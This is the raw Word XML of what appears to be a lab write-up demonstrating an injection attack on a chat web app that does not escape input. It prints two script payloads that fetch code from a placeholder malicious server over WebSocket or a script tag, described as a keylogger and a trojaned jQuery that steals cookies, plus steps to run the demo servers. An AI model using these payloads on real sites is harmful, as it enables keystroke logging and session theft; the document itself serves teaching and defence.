    <w:p w14:paraId="66B7E80E" w14:textId="1CF5EFA6" w:rsidR="00674A20" w:rsidRDefault="0061435F" w:rsidP="00050DA9">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:tab/>
        <w:t>Already “</w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>injected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">” into the </w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">HTML paged served by the legitimate server are two </w:t>
      </w:r>
      <w:r w:rsidR="00050DA9" w:rsidRPr="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements that simulate an HTML injection attack on an amateur web app that does not escape input strings.</w:t>
      </w:r>
      <w:r w:rsidR="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> Between the two </w:t>
      </w:r>
      <w:r w:rsidR="00674A20" w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r w:rsidR="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements, malicious use of WebSocket is implemented </w:t>
      </w:r>
      <w:r w:rsidR="00D03EA4">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>both in-line and through the use of an external source file</w:t>
      </w:r>
      <w:r w:rsidR="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>This code could also be copied into the chat box causing the browser to unknowing</w:t>
      </w:r>
      <w:r w:rsidR="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute the malicious code which is </w:t>
      </w:r>
      <w:r w:rsidR="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">similar </w:t>
      </w:r>
      <w:r w:rsidR="00050DA9">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t xml:space="preserve">to how these attacks may actually be carried out. </w:t>
      </w:r>
      <w:r w:rsidR="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>The Two elements are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF6DEE0" w14:textId="15AE8821" w:rsidR="00050DA9" w:rsidRDefault="00674A20" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D52270" w14:textId="75E453AD" w:rsidR="007C717E" w:rsidRPr="007C717E" w:rsidRDefault="007C717E" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>&lt;script type="text/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28752EEF" w14:textId="4F0099F3" w:rsidR="00050DA9" w:rsidRPr="007C717E" w:rsidRDefault="00050DA9" w:rsidP="00D529A0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>MalWS = new WebSocket('ws://</w:t>
      </w:r>
      <w:r w:rsidR="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t>mal-server</w:t>
      </w:r>
      <w:r w:rsidR="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">:5001/', </w:t>
      </w:r>
      <w:r w:rsidR="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>'echo-protocol');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329641F2" w14:textId="0D4A72FA" w:rsidR="00050DA9" w:rsidRPr="007C717E" w:rsidRDefault="00050DA9" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>MalWS.onmessage = function(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496CA074" w14:textId="4E8D4B65" w:rsidR="00050DA9" w:rsidRPr="007C717E" w:rsidRDefault="00050DA9" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>sc = document.createElement('script');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67545D2D" w14:textId="141F3C02" w:rsidR="00050DA9" w:rsidRPr="007C717E" w:rsidRDefault="00050DA9" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>sc.type = 'text/javascript';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162F34BF" w14:textId="378BFEDF" w:rsidR="00674A20" w:rsidRPr="00674A20" w:rsidRDefault="00050DA9" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>sc.appendChild(document.createTextNode(e.data));</w:t>
      </w:r>
      <w:r w:rsidR="00674A20" w:rsidRPr="00674A20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C07464D" w14:textId="50D85223" w:rsidR="00674A20" w:rsidRPr="00674A20" w:rsidRDefault="00674A20" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>B = document.getElementsByTagName("body");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2574A7EB" w14:textId="77777777" w:rsidR="00674A20" w:rsidRDefault="00674A20" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
        <w:t>B[0].appendChild(sc);</w:t>
      </w:r>
      <w:r w:rsidR="00050DA9" w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="59936B7E" w14:textId="075AA044" w:rsidR="0061435F" w:rsidRPr="007C717E" w:rsidRDefault="00674A20" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00050DA9" w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B8779D" w14:textId="3F892829" w:rsidR="007C717E" w:rsidRDefault="007C717E" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD67701" w14:textId="77777777" w:rsidR="00B265BB" w:rsidRDefault="00B265BB" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="406610D3" w14:textId="3818B95A" w:rsidR="007C717E" w:rsidRDefault="007C717E" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">This code opens a websocket connection with the malicious server, downloads the malicious file </w:t>
      </w:r>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>KeyCookieLog.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> and uses it to create a </w:t>
      </w:r>
      <w:r w:rsidRPr="007C717E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> element that is appended to some element in the HTML page, causing the browser to execute the code, which records keystrokes and steals cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176D4FE9" w14:textId="579F5384" w:rsidR="00674A20" w:rsidRDefault="00674A20" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1653DFCC" w14:textId="6A21DFB6" w:rsidR="00674A20" w:rsidRDefault="00674A20" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0000F5" w14:textId="1BC14C20" w:rsidR="00674A20" w:rsidRDefault="00674A20" w:rsidP="007C717E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>&lt;script sr</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>c="http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t>mal-server</w:t>
      </w:r>
      <w:r w:rsidR="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00D529A0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>:5000/jqnc.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192170E" w14:textId="77777777" w:rsidR="00B265BB" w:rsidRPr="00674A20" w:rsidRDefault="00B265BB" w:rsidP="007C717E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AA44A40" w14:textId="4719B031" w:rsidR="00B265BB" w:rsidRDefault="00674A20" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">This code request the </w:t>
      </w:r>
      <w:r w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>jqnc.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> file from the malicious server. As stated above, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00674A20">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>jqnc.js</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> file is the uncompressed version of the jQuery library with a code insertion that steals cookies and sends them to the malicious server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3289E944" w14:textId="6FC6B2B0" w:rsidR="00D03EA4" w:rsidRDefault="00D03EA4" w:rsidP="00674A20">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34C1F3BD" w14:textId="285A7B59" w:rsidR="00D03EA4" w:rsidRDefault="00D03EA4" w:rsidP="00D03EA4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D03EA4">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Executing the Malicious Functionality:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323ADEDF" w14:textId="1784ED2D" w:rsidR="00D03EA4" w:rsidRDefault="00D03EA4" w:rsidP="00D03EA4">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04FFD4B3" w14:textId="3399A48D" w:rsidR="003A72B6" w:rsidRPr="003A72B6" w:rsidRDefault="00D03EA4" w:rsidP="003A72B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">Start the </w:t>
      </w:r>
      <w:r w:rsidR="003A72B6">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">egitimate server by navigating to the directory where it is contained and </w:t>
      </w:r>
      <w:r w:rsidR="003A72B6">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>entering the command “</w:t>
      </w:r>
      <w:r w:rsidR="003A72B6" w:rsidRPr="003A72B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>node app.js</w:t>
      </w:r>
      <w:r w:rsidR="003A72B6">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidR="003A72B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7745085D" wp14:editId="7B6D16EF">
            <wp:extent cx="594360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02970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AA8208" w14:textId="7D895276" w:rsidR="003A72B6" w:rsidRDefault="00B265BB" w:rsidP="003A72B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>Similarly, s</w:t>
      </w:r>
      <w:r w:rsidR="003A72B6">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>tart the malicious server by navigating to the directory where it is contained and entering the command “</w:t>
      </w:r>
      <w:r w:rsidR="003A72B6" w:rsidRPr="003A72B6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>node app.js</w:t>
      </w:r>
      <w:r w:rsidR="003A72B6">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A541F76" w14:textId="5D9E95B2" w:rsidR="003A72B6" w:rsidRDefault="003A72B6" w:rsidP="003A72B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27E1B9A3" wp14:editId="069E8D77">
            <wp:extent cx="5943600" cy="88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87730"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DDBDE9" w14:textId="0F33139B" w:rsidR="003A72B6" w:rsidRPr="003A72B6" w:rsidRDefault="003A72B6" w:rsidP="003A72B6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve">Open your web browser and enter the </w:t>
      </w:r>
      <w:r w:rsidR="00B265BB">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B265BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>http://[</w:t>
      </w:r>
      <w:r w:rsidR="00B265BB" w:rsidRPr="00B265BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
        </w:rPr>
        <w:t>Legit-Server-IP</w:t>
      </w:r>
      <w:r w:rsidR="00B265BB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
        </w:rPr>
        <w:t>:3000/</w:t>
      </w:r>
    </w:p>
